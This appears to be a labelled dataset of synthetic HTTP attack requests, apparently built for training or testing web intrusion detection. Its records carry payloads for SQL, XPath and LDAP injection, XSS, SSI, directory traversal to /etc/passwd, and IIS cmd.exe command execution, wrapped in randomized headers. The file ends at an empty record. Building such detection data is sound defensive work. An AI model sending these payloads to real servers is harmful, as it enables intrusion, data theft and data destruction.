User-Agent: Mozilla/3.1 (X11; U; Open BSD i386 3.4; mt-ts; rv:7.1.8) Gecko/09924359
UA-CPU: StrongARM
UA-Disp: 8119,252,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0076x7912
Via: HTTP/2.3 254.213.30.94, 4.8 www.Hwcseaho.gif
Transfer-Encoding: identity
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 627 www.luad.js "7atl" "Sun, 01 Jul 07 05:55:47 CET"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44928
Start - Id: 39674
class: SSI
GET /qAyfivarjeocEziaeh/esB-DDr/kBt_vMdczkl.mspx?Qt1nf3Z5=n&ncCiskostn=wrodocumento6pkt3c&a1hwq9azhptmf=4540&L0=mCFjp5&aN5FD834yU=c%3ETmyi&ysmh=w3A.WkaR&ao9gsxsz=yh%27suservicesm%5DpassthrueSr&Md14t=%3C%21--+++%23include++++virtual%3D%22%2Fetc%2Fpasswd%22+++++--%3E&mtkseour0=a&Eno0yoiondm=k%3AsnxeleautoexecOlojr HTTP/1.1
Host: www.9onnte1.de
Connection: nnpejnm
Accept: */*
Accept-Charset: big5
Accept-Encoding: gzip;q=0.9, deflate, deflate;q=0.7, deflate, deflate;q=0.1
Accept-Language: *;q=0.6
Cache-Control: max-stale=9144
Client-ip: 17.56.25.243
Cookie: tfnanneccoere7=epNh:;iwcyEtpdtt=kihnull@|c;insertrt]at5l/a3n;qeiowt=264287;cb=eh0;7xusr2kpgroup byIB=yjmbXasQn1h;rfenrOr=scLbEguV6ra
Cookie2: $Version="57"
Date: Wed, 23 Jul 08 08:01:40 UTC
ETag: "MnC6RG5yCfdECDak"
Expect: 100-continue
From: odEootep@ltmngy.biz
If-Modified-Since: Sat, 23 Dec 06 07:02:01 UTC
If-Unmodified-Since: Sun, 09 May 04 23:21:20 CET
If-Match: *
If-None-Match: "lR-A7X_--x_5AiH"
If-Range: "xK1saFgGulzrQ2lzG4D4"
Max-Forwards: 2
MIME-Version: 6.1
Pragma: ettdi=ter
Proxy-Authorization: NTLM eGVkdGNhbzJhc2l3dHBjcGF0cndpcmMxdHNldGx1ZTBxZXRSbHVl
Authorization: Basic aDB0c3VzYTp0YXROdg==
Range: 047-,52-2392,30343-939979
Referer: /hhr8wist.aspx
TE: chunked;q=0.7,chunked;q=0.4
Trailer: Upgrade
User-Agent: ni@A4m http://www.aeles.de
UA-CPU: 68000
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 726x074
Via: 2.0 21.233.60.202, FTP/3.7 26.203.213.23
Transfer-Encoding: identity
Upgrade: oos/3.5, rts/5.9, ns9lh/5.9, csOEa/6.4, tncn/0.3
Warning: 733 214.19.169.247 "I5ohianit" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 919920115
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39674
Start - Id: 41615
class: SqlInjection
GET /ijmdmnrO2r1rbeheo/cVxkiw/40Gy0zxSV1y/arl5hidmret/tenbai3di/ZErny1/on7yHnas/Yhtpasst0R0perl_20rIF/gPAzhome5FQHgFJ1/ebmQwaHKdP_V/adpe4ndudemdwtASt/7jy.mspx?eD=fi1%7C%3Cvarls+b-u&ecL=jQU&l1toeeo=h%5DRhtpass&f7lacin8e=22&trt9gtarrorxwsn=%27%3B+++++drop+table+++++admin HTTP/1.0
Host: 116.53.135.222:80
Connection: keep-alive
Accept: image/png
Accept-Charset: utf-8, x-mac-chinesesimp
Accept-Encoding: *;q=0.7
Accept-Language: e-6A7t, tsadCl-tt
Cache-Control: no-transform
Client-ip: 224.247.255.87
Cookie: esui0lko9ta=nhtitimco/e2i;l@cUtelnet=aaNjSJDKNrs;YQZI=f]usr;srgwaar=imenetterstrt8ua;ifn=s3teisiaaaAaOa9e;iiuiuvtv2urr=1790
Cookie2: $Version="003"
Date: Thu, 13 Sep 07 06:01:36 CET
ETag: "5AYEIKIO38UMnPD"
Expect: 100-continue
From: tcssd@oays6you.com
If-Modified-Since: Fri, 12 Oct 07 03:49:35 UTC
If-Unmodified-Since: Sun, 05 Jun 05 01:39:20 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 25 Apr 06 05:14:02 GMT
Max-Forwards: 5210
MIME-Version: 3.1
Pragma: nqsm=n2wk
Proxy-Authorization: In9rk gyigt=48zd
Authorization: gacor pelAotem=lk8lt
Range: -27,878-
Referer: http://www.ieogrZ.be/OrnW.gif
TE: gzip;q=0.0
Trailer: Host
User-Agent: vdmxdbDfar/9.4
UA-CPU: MIPS
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0620x1367
Via: HTTP/7.8 www.eiuCro.css, HTTP/8.5 www.2iertm.jpeg, 6.4 158.50.218.211
Transfer-Encoding: compress
Upgrade: bxnsG/8.0, e7cm/6.6
Warning: 589 www.3dab.jpg "husrsrrj" "Mon, 17 Jul 06 16:04:46 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41615
Start - Id: 47602
class: XSS
GET /irYt6uul/nuF22phcRzaSn_q./as/aPXmQHOl/hmf.timyPnBo/td4nefacant/GS1Jctelnet/7hait9fe5frh5hL034/miy1ite6aunseln/hZ6.tiff?te7r7n=candie&nafEcfaSn=5NjIzK_8ef&rq1taale=4319&1noiID=%3Cimg+++src++++%3D%22+teolol++%3E++%22++++onmouseover++%3D+%22+++%5Balert+++%28%27ert9h%27%29%3B%5D+%22++++%3E&ieeadNiepdspzt=6&nwn=27&.3window.openwincludeS=%28+olsoperle+%7E HTTP/1.0
Host: 210.151.189.97:9141
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.8
Accept-Language: *
Cache-Control: no-cache
Client-ip: 154.17.60.227
Cookie: eh=nShLD98;IUexecJPUWsystemY=4;aae=a7on;tezasrxihiie=lsdmteciSt gI;satt6ylhe=cT2X0;3N5KXqZ=h
Cookie2: $Version="9"
Date: Thu, 30 Nov 06 08:20:40 GMT
ETag: W/"bU9.8Ix3.rrbQf8zaHN"
Expect: pUonr4u1
From: zl3e2@1ftosH.com
If-Modified-Since: Thu, 24 Jan 08 06:18:35 GMT
If-Unmodified-Since: Fri, 02 May 08 16:35:14 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 8.3
Pragma: Skaeuth=gEshlD
Proxy-Authorization: Digest qop=auth-int
Authorization: Mgwrno fstn=iepnski
Range: 849916-
Referer: /aopgeytd/etca8.shtml
TE: chunked,gzip,chunked
Trailer: Trailer
User-Agent: Mozilla/4.6 (Machintosh; U; PPC 0.1; oa-32; rv:4.8.4) Gecko/63013209
UA-CPU: StrongARM
UA-Disp: 3299,575,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 608x141
Via: 0.3 www.Qtetnp6.css, 4.7 32.131.159.128, 82gd/5.2 122.59.42.154
Transfer-Encoding: deflate
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 002 240.231.55.176:97 "DparR" 
X-Forwarded-For: 28.174.36.198
X-Serial-Number: 2524902769036083814
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47602
Start - Id: 48503
class: XPathInjection
PUT /GFy.gif? HTTP/1.0
Content-Length: 156
Content-Language: bEiabmr,mtmllsIs,1dsa
Content-Encoding: identity
Content-Location: http://www.Uaog.uk/n6qudibx.tiff
Content-MD5: dXQ5cmlvc29lRGFjbnNQMw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Jun 06 24:22:13 GMT
Last-Modified: Mon, 19 Sep 05 19:35:28 UTC
Host: www.sid9vwadph.de
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-8859-5;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 186.162.234.129
Cookie: uytsnaeasiulot=nane9ripm0o
Cookie2: $Version="04"
Date: Fri, 06 Jun 08 16:28:17 CET
ETag: W/"Z8k6MID8rdOhM91kgfF"
Expect: osOsoea
From: numhoTo@rsni1ore.com
If-Modified-Since: Fri, 01 May 09 12:08:42 GMT
If-Unmodified-Since: Mon, 02 Jul 07 23:15:02 UTC
If-Match: "HEIPNYUXvoM-pIeztMy"
If-None-Match: "Bpw3BlNjf8aqGkLk4VLy"
If-Range: Fri, 26 Aug 05 07:49:20 UTC
Max-Forwards: 2794
MIME-Version: 1.8
Pragma: no-cache
Authorization: NTLM ZW5hZmVlbm9yYU9mbXNuZ256M1llZTRvSml6dG9GcjZpcHh0c2VDb3l0bg==
Referer: http://tnujs.st/trxE.bin
TE: trailers
Trailer: Pragma
User-Agent: rmWcv/2.7.8
Via: eae/2.8 www.0p9a.htm, HTTP/5.6 37.124.9.63
Transfer-Encoding: compress
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 01871
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

vvbscriptBh9haccess_logGBI=51797&ydf=807&m1c=ec']    |    P   |     //user[   name/text()    = 'g8&dloa=gehotOa&t9hncsyaptg9= cadmin

End - Id: 48503
Start - Id: 38439
class: LdapInjection
GET /eyanPludmrosr/Gqt/EzavMibc3fntttedra/9.hpNurODR8KdBj.js?iIesiThutrwE=i6acEyaqengppu&wiavsaslirHcn7i=y6o1g&np=mondipstcI&h4ASX@=68&dhysaeAt=519165398&nlsudssyeEedde=9406&njr6e=qeqX9BGQH&3gNtmemeIineh=e&X_BcservicesJiJGbgsound=i7tLLjju0SJ&uPRrsglFsock_stream=%29+%28+%7C+%28displayName%3Dhad*%29%28name+++%3D++had*%29%28mail%3Dhad*++++%29&Hppdhhr1r=624205&sys=sd&tiio2Lt=00477729&pnleWHhn=kMu HTTP/1.0
Host: 114.40.49.7:4892
Connection: keep-alive
Accept: video/*
Accept-Charset: iso-8859-9;q=0.9, utf-8, windows-1254;q=0.3, x-mac-korean, x-mac-turkish;q=0.4
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 205.120.8.115
Cookie: mD6qk=hiNeeals5hew;91Hs76aa5=0arua23yQtslth8;ufg5saanhEcsmac=62vN;utpAcjuezss=50718;koiigekoawt=r/sock_streamhipwoIn;iawn7r2hEOf=5621123
Cookie2: $Version="1"
Date: Mon, 28 Apr 08 23:23:03 UTC
ETag: W/"BpcspexLKViXdbtMsF0W"
Expect: a8zE262
From: bleovs1n@HWots.com
If-Modified-Since: Thu, 05 Feb 04 12:51:43 GMT
If-Unmodified-Since: Fri, 06 May 05 16:01:29 UTC
If-Match: "lYDjuaJTlLKJXd0A47"
If-None-Match: *
If-Range: "q7eMab4Ky8tBfHu6"
Max-Forwards: 1850
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM YXVueWV1dG5kc01uZWVzb3JlaUhrRm5hdGFld2hoc3Ryb250bm44
Authorization: Digest username="aSaCs"
Range: 722-
Referer: http://www.ilaeuet.cz/a0ieg/wvmoa/n7tr/urvdse/EgALa5.mdb
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/8.7 (X11; U; Unix 0.4; ta-Fc; rv:7.6.5) Gecko/82396474
UA-CPU: 68000
UA-Disp: 6654,995,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 040x944
Via: 8.9 15.5.121.42
Transfer-Encoding: compress
Upgrade: tunet/0.9, arant/2.6, wts/9.0, gdp/6.1
Warning: 002 214.157.156.89:632 "8yEitwPEhweiynae" "Mon, 24 Nov 08 09:49:08 CET"
X-Forwarded-For: 62.19.165.119
X-Serial-Number: 8565701730547644653
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38439
Start - Id: 44675
class: PathTransversal
GET /n-Xy7vwF/eBOlv-lHl3YkCbu.XXG@.png?enyhmtaHhsani=hesn4etWn4tholaeao&Stw=37807&oeeZefooRhO=4t4oroRa4dewen&Y3wrDl2OQzNT=riiiabdlm93rbi&Tdiweenitiowxet=ylsdkntwg HTTP/1.0
Host: www.y5or.it
Connection: keep-alive
Accept: video/*;q=0.2
Accept-Charset: x-mac-cyrillic;q=0.7, windows-1250;q=0.4, euc-tw, windows-1254
Accept-Encoding: *
Accept-Language: esAuax-cs;q=0.0, tfoi-qy;q=0.5, Ti-ree;q=0.2
Cache-Control: max-age=56119
Client-ip: 112.69.124.168
Cookie: sJ5Wu5BbIKp=a(position&e;AteeosczSoew1u2=iX_fR1PLJQxs;@YpassthrucEt6o=xtermxn;e5ihuer=-0Jdju$;rsl=../../../usr/dsqqdsqsd.xml
Date: Thu, 18 Jan 07 05:18:45 CET
Expect: y6eg=Tqcft
If-Match: "U3kFvtsZ4CuV@zzfQOE2"
If-None-Match: *
Max-Forwards: 1
Referer: /ld6na8t/l01p6.sh
User-Agent: oxwetl5l2
Upgrade: trxtv/3.0

null

End - Id: 44675
Start - Id: 41763
class: SqlInjection
GET /HlinkunionQE8PVUjqm@PS/oLTThe.KXmT/no/weeagpoi4taiaa7ont/ood73YeHTg@u/ra37ineeba6ht5/jPBRqKIj4d4huO5aQRDC/eXRki19WGSLz0Ns9djs/xtx6udeatrn8se/1G87@ut8V/u9h8Z_uxtf5iTh.js?s1hime2srn=4Ec%27+++UNION+++++%2F**%2F++++SELECT+++Gtpip3i1+++FROM+++dba_users+++WHERE++++es+++like++++%27%2525&feo6xe6=243&hid1thmrsnes=cBKjMDP&jtfatia=7 HTTP/1.1
Host: www.ehi3Ntr.st
Connection: close
Accept: video/*;q=0.5, video/quicktime, video/*
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.7, compress, identity;q=0.4, gzip;q=0.8
Accept-Language: mt-ysvsr, eeqr-Qes;q=0.7, S-vm
Cache-Control: taT='umoon'
Client-ip: 34.136.27.140
Cookie: .Xi-qHVi8=31;erla=4874;ndgslocoia=g9ts;aeft2i0=access_log\ ;a4pnasw5e=lelike
Cookie2: $Version="0"
Date: Sun, 29 Apr 07 20:08:05 CET
ETag: "xdRpcd80difxy7zp-Wn"
Expect: osevnd
From: lehFo@eioiwni.cz
If-Modified-Since: Mon, 26 Jan 04 07:28:11 GMT
If-Unmodified-Since: Mon, 24 Jul 06 04:52:30 UTC
If-Match: "gDP@ZAnsleJxq6xth8"
If-None-Match: "oBBsLb.qbM62md.zyB"
If-Range: *
Max-Forwards: 8488
MIME-Version: 2.4
Pragma: iytsmoze='dofTo'
Proxy-Authorization: Basic c0F0b3k6ZW4wbm9vdG0=
Authorization: Digest nonce
Range: 4234-490888,-164882
Referer: /itie9nts/ew0aate6/uedo8t.msf
TE: gzip;q=0.9
Trailer: Cache-Control
User-Agent: roaenw/3.0
UA-CPU: 68000
UA-Disp: 9710,8359,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 9206x518
Via: FTP/6.6 80.232.6.242:88, 5.7 www.ltjet.js, 8.0 138.214.11.40
Transfer-Encoding: identity
Upgrade: smh6/1.5, nsded/2.1, ezu/4.9, ie5rE/9.9
Warning: 047 www.s7aieai.js "nisluLPLAsoy" "Fri, 29 Jun 07 15:53:33 GMT"
X-Forwarded-For: 126.254.87.29
X-Serial-Number: 81915611891
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41763
Start - Id: 36587
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.rhinenr.de
Connection: csrg
Accept: image/*, video/quicktime
Accept-Charset: ks_c_5601-1987, x-mac-ce;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: szv=gnqsnai
Client-ip: 76.108.144.255
Cookie: tfcbiaeolEm=aIoar~n;lpo0QOKe9tsF=2;kx6s=oirofsdtotow;6e=csv
Cookie2: $Version="05"
Date: Thu, 04 Dec 08 08:09:12 CET
ETag: W/"ii87XQjje42GUbBHrDr"
Expect: 100-continue
From: oAud4eo@aM6ymuu.de
If-Modified-Since: Thu, 26 Mar 09 02:12:14 UTC
If-Unmodified-Since: Fri, 06 Feb 09 15:28:39 GMT
If-Match: "sjzbDPggXqFv7mTRp"
If-None-Match: "U8jhXuzH.@IoHUz9Vl"
If-Range: "YkdFyFmR4vc.Sz8ebw"
Max-Forwards: 150
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM QWlyQnJpcGRlYWlSYWFla254emFpZzFkaGRjcXN0ZG9odXRsZXlocm5BZQ==
Range: -5
Referer: /eyva/beONote/imoati/15Lno/eA4au.pdf
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/9.5 (X11; U; SunOS sun4u 6.7; to-e1; rv:5.7.3) Gecko/21787017
UA-CPU: MIPS
UA-Disp: 380,5893,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: HTTP/3.4 63.108.104.73
Transfer-Encoding: weytp; aa4iwne=on7I4ht
Upgrade: ldezE/3.1, ieuhio/3.5, vasgc/3.8, trl4e/6.5
Warning: 611 www.lnn5olje.js "lioehd4dehdsc3y" 
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 35669547632
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36587
Start - Id: 36498
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .com? HTTP/1.1
Host: www.fe7wReS.biz
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: oe='srae'
Client-ip: 58.145.54.71
Cookie: awntcsze5enLhyn=elc6unbae1in;adopsao3eheSad=iframe;anei4ocl6=seQ8NM@j
Cookie2: $Version="050"
Date: Fri, 12 Sep 08 07:57:57 GMT
ETag: W/"vjbM4Bxb6G26xH._"
Expect: atcEeo
From: oliee@2ucHyiTL.org
If-Modified-Since: Sun, 09 Aug 09 09:21:51 CET
If-Unmodified-Since: Thu, 21 Jan 10 17:11:10 UTC
If-Match: "lMqOAnisi3zsqiE"
If-None-Match: *
If-Range: "_z.zCFUN3Jq.GaGGwX6"
Max-Forwards: 49
MIME-Version: 6.2
Pragma: ots98=o
Proxy-Authorization: iuqrt iwRdnnb=pgerxsn
Authorization: Basic cmVlb0UwcjppcmVtdHlhZA==
Range: 998505-,-0540,815-
Referer: /tfpt/tniwiheo.jpeg
TE: trailers,trailers,chunked;q=0.5
Trailer: If-Modified-Since
User-Agent: Mozilla/4.8 (Windows; U; Win98 5.0; e9-ti; rv:1.2.4) Gecko/02867862
UA-CPU: MIPS
UA-Disp: 898,9805,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 512x1298
Via: esr/2.8 113.183.178.105
Transfer-Encoding: compress
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36498
Start - Id: 46134
class: PathTransversal
GET /rTF-paGdCgc/rmiTseoh/o2-hK/tEeJsnFZw3K/omWRMEgW/abpIv9DBDaOaBpTkL6/tiiIleaNlathlmyUUl/aNUU_CuiwXS/winnt7cS0BSUc/ynkqD3YBN84ep5FVRcX/prXA0.swf?lHioe=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 77.136.72.32:048
Connection: keep-alive
Accept: audio/*;q=0.3, text/html, image/gif;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: nosntol-2Sia, dhii-xbl;q=0.5, eNtb-zroeo, aM-ets3vovo;q=0.3, da-ar7;q=0.3
Cache-Control: min-fresh=5
Client-ip: 252.43.14.227
Cookie: aY64kT5=A
Cookie2: $Version="5"
Date: Sun, 04 Apr 04 03:54:57 CET
ETag: W/"GpXBhJEcBz_@Y8t"
Expect: 100-continue
From: r9hecgen@ob8h.it
If-Modified-Since: Sun, 16 Nov 08 02:13:07 GMT
If-Unmodified-Since: Sat, 16 Jan 10 02:35:13 UTC
If-Match: "uKJ0-pMXX2Tr5VWZstpU"
If-None-Match: "gSMREJNl9MM9dFNO"
If-Range: *
Max-Forwards: 04
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: NTLM ZmtlMG53bm9pc3N0cDR1aWlhbmF2b2FkaGM1aW5ldGhk
Authorization: xYQl wioxp8h=9tUoes
Referer: /saeetece/5ztt.jpg
TE: deflate
Trailer: If-Match
User-Agent: koHa (ugVSTFj)
UA-OS: Windows NT
Via: 5.7 www.rboyeeor.html:77
Transfer-Encoding: compress
Upgrade: 4sr0z/5.8, 5eIsba/5.8, lviujp/4.0, arJ2h/2.1, fgge/2.5
X-Serial-Number: 83931
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46134
Start - Id: 44279
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.amtnoarn.fr
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: compress, deflate
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 192.246.21.91
Cookie: chcoeeseaHu=8abbsanw7allu 
Cookie2: $Version="487"
Date: Mon, 23 Apr 07 24:10:15 UTC
ETag: "lRY.im-Vf8FuriFi"
Expect: 100-continue
From: aEtkm@tNLeshe.uk
If-Modified-Since: Wed, 07 Oct 09 09:10:23 GMT
If-Unmodified-Since: Sat, 19 Jan 08 11:06:57 CET
If-Match: *
If-None-Match: *
If-Range: "QwmlmmG7j.GuYQ4NBEc8"
Max-Forwards: 68
MIME-Version: 6.9
Pragma: tdrp=f
Proxy-Authorization: vahee otnsenso=4Odndyfc
Authorization: Basic dHNjdDo2N2R3bnJl
Range: 15730-74318,73-49
Referer: http://h15ofnO.biz/Tbqgmoin/8a0h/1a2wc/iey1eTr.asmx
TE: chunked;q=0.8,trailers
Trailer: Via
User-Agent: hCK1959 http://www.fIa4wN.st
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 902x0631
Via: igk9/5.4 www.6gaSer.htm, 9.8 5.18.32.190, chpde/5.9 134.151.163.153
Transfer-Encoding: gzip
Upgrade: coeeIl/9.2, natae/9.1, hi4/9.9, 3tu3nt/4.6, epa5c/2.6
Warning: 674 28.181.161.239 "fsbetechtt6msa4eu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 87791101469123011682
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44279
Start - Id: 49860
class: XPathInjection
GET /arqoN8/glojcnoc94h7v2se/tLY5.v9/sovUG7.pl?etp=mrac1&t@W2DkW=%29ee&aArtpTR8aeexx2t=ee0da+au6c&Ntwrer=uxd%27+++++or++++%28i++++%3C+++count%28etfooi%2Fchild%3A%3Atext%28%29%29++and++++j++++%3C+++count%28stTm7t%2Fchild%3A%3Acomment%28%29%29++and++++k+++++%3C+++++count%28aI%2Fchild%3A%3A*%29+++++%29+++++or+%27fjo%27%3D++++%27+++++aeo%27++or&et28hEnNP=g&jurtae9oesr=g%3Crlocationitne HTTP/1.0
Host: 175.147.96.168
Connection: close
Accept: audio/*;q=0.6, application/zip;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: deflate, identity, identity, gzip;q=0.6
Accept-Language: *
Cache-Control: no-cache
Client-ip: 177.96.126.182
Cookie: hTet5=Lnetcat
Cookie2: $Version="51"
Date: Wed, 19 Aug 09 11:29:48 GMT
ETag: "NDiIklCvnhpXi_h6"
Expect: 100-continue
From: eslc7@67owp.net
If-Modified-Since: Thu, 05 May 05 11:47:39 UTC
If-Unmodified-Since: Thu, 24 Mar 05 18:56:24 UTC
If-Match: *
If-None-Match: "JDaSU7byU-bMyTWdFif"
If-Range: *
Max-Forwards: 71
MIME-Version: 4.7
Pragma: pn2=eN2
Proxy-Authorization: NTLM b3NuaFBhaDRjZW9oaWhueG50aGJuaWQ4OGVUOHg0RXRucw==
Authorization: xlE0 aelJ=NEonemxl
Range: 40331-8,658595-,136-
Referer: /nbeeac5.nsf
TE: trailers
Trailer: From
User-Agent: m1eNerg/7.8.3.6
UA-CPU: MIPS
UA-Disp: 020,0020,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 035x0433
Via: 9.1 62.8.231.97
Transfer-Encoding: deflate
Upgrade: eht/0.8, T3l/7.9, myt2/5.8
Warning: 988 26.40.140.189 "waoenT" 
X-Forwarded-For: 246.212.130.181
X-Serial-Number: 5095784293385
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49860
Start - Id: 48475
class: XPathInjection
GET /ukEwHwpL24Muhe5Bk6/LZTvP/ZhTfDAAcHR-/5l6dyBi@V5mwoH7hB/wlntHyyscjmniaiwu/msFWsw3vQk/dzrt/HkpasswdoptN1r/eis/tyi/pg@lye5Ir9l.sh?rasOsdpanht=eer64&sesntedTd=640555&bUa6Rnetder=7t6&nnetbtqr8sqRo=tkGq&tmscit7sCnrd=dEs4QH&ohr=fnreistMfhcoddMy6&dw1e=c-bfteggldRaae+uboot.initoy&l.-hSW=qrlhecc0csdrN&semioeTu2=salHtbgos4siitYanf&HpcFn1htpassRQ.4=nhsgcICopwyfss&sEm=jm%2Flsock_streameaI5ashavingapassthruTinputi+did&stcssyraevc7oie=c%7Ctsacrcr4leo+a&sar2Sdwt=i5sn4t1UCG9L&sennswioty=120&isiEno=eb3metah%27t%3Frrg-input%5Brse7l HTTP/1.0
Host: 195.60.53.50
Connection: kabue
Accept: */*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.5
Accept-Language: Eda1bwsf-Haei6ds
Cache-Control: no-store
Client-ip: 198.49.180.17
Cookie: odre=yHt'     or    count(    path/child::node()[position(   )=((  i  +  j   +k+  l +    1)]  | path/child::*()[position()=(k+1)])=1     or   'uiIcra'=    ' rdar'     or;eilqkhupia=oeiivtrtglhncocq;mtlale8potp2=iSzeMUF
Cookie2: $Version="03"
Date: Sat, 21 Nov 09 15:07:28 CET
ETag: W/"WLuhGkhlC0FIgXo52B"
Expect: 100-continue
If-Modified-Since: Fri, 06 Aug 04 09:46:28 UTC
If-Unmodified-Since: Tue, 09 Feb 10 19:40:07 CET
If-Match: "cUkyR0DdeCyHTep6nOJ7"
If-None-Match: "yS480kxjswMuU@_W"
If-Range: Wed, 18 May 05 22:56:19 GMT
Max-Forwards: 59
MIME-Version: 3.9
Pragma: enhdpl=yhrty
Proxy-Authorization: Digest response="3ecaA3DA260cb9A81E7121fefD40e878"
Authorization: ascU p5v3Nae=msekndfa
Range: -7206,3-30956,-92506
Referer: http://d4ddlcTI.com/ecxlek.exe
TE: deflate;q=0.9,trailers
Trailer: Host
User-Agent: Soa9/9.1
UA-Disp: 6391,630,16
UA-OS: Solaris
UA-Color: color8
Via: 1.7 8.10.114.86, 1.1 www.atso.css, 0.1 11.162.177.51
Transfer-Encoding: compress
Warning: 970 www.loschtan.shtml:1 "dISrElrc" "Sat, 01 Dec 07 05:56:12 GMT"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48475
Start - Id: 44242
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.kuthtiXde.net:80
Connection: cItorup1
Accept: video/*;q=0.5, audio/x-wav
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 157.29.164.15
Cookie: Hdympite=seeHrea0tY;geCmte=fet6 oi;6SaurtedzisEcte=88862;6.gTlBufO=n6  $lntttctmp;rRF3bir3sspeane=tfttiswherec;acsias=n1Jkty
Cookie2: $Version="9"
Date: Wed, 07 Sep 05 23:48:24 UTC
ETag: "-8T0kbq_jilGiD3"
Expect: uNcro
From: ided@udhoes.uk
If-Modified-Since: Sun, 17 Aug 08 20:36:54 CET
If-Unmodified-Since: Mon, 07 Mar 05 11:34:53 CET
If-Match: *
If-None-Match: "nHqelmTAXyPEbWth"
If-Range: Fri, 02 Nov 07 05:13:07 UTC
Max-Forwards: 5
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic aHRybng6ZWxMYQ==
Authorization: Digest nonce
Range: 9-
Referer: http://D9iet.be/Telhuo/dbita/nheegsb.css
TE: trailers
Trailer: Date
User-Agent: enzrsdooONeayesne
UA-CPU: PowerPC
UA-Disp: 220,5543,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 352x848
Via: HTTP/4.1 104.245.120.13, HTTP/2.1 245.174.241.3:8
Transfer-Encoding: compress
Upgrade: 0sp/8.6, gthorA/5.1, rolgoc/8.9, ueeiT/5.3, ylot/4.6
Warning: 992 www.i1e3itee.jpg "capc8tz" 
X-Forwarded-For: 242.235.213.130
X-Serial-Number: 5593784151230752616
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44242
Start - Id: 46704
class: XSS
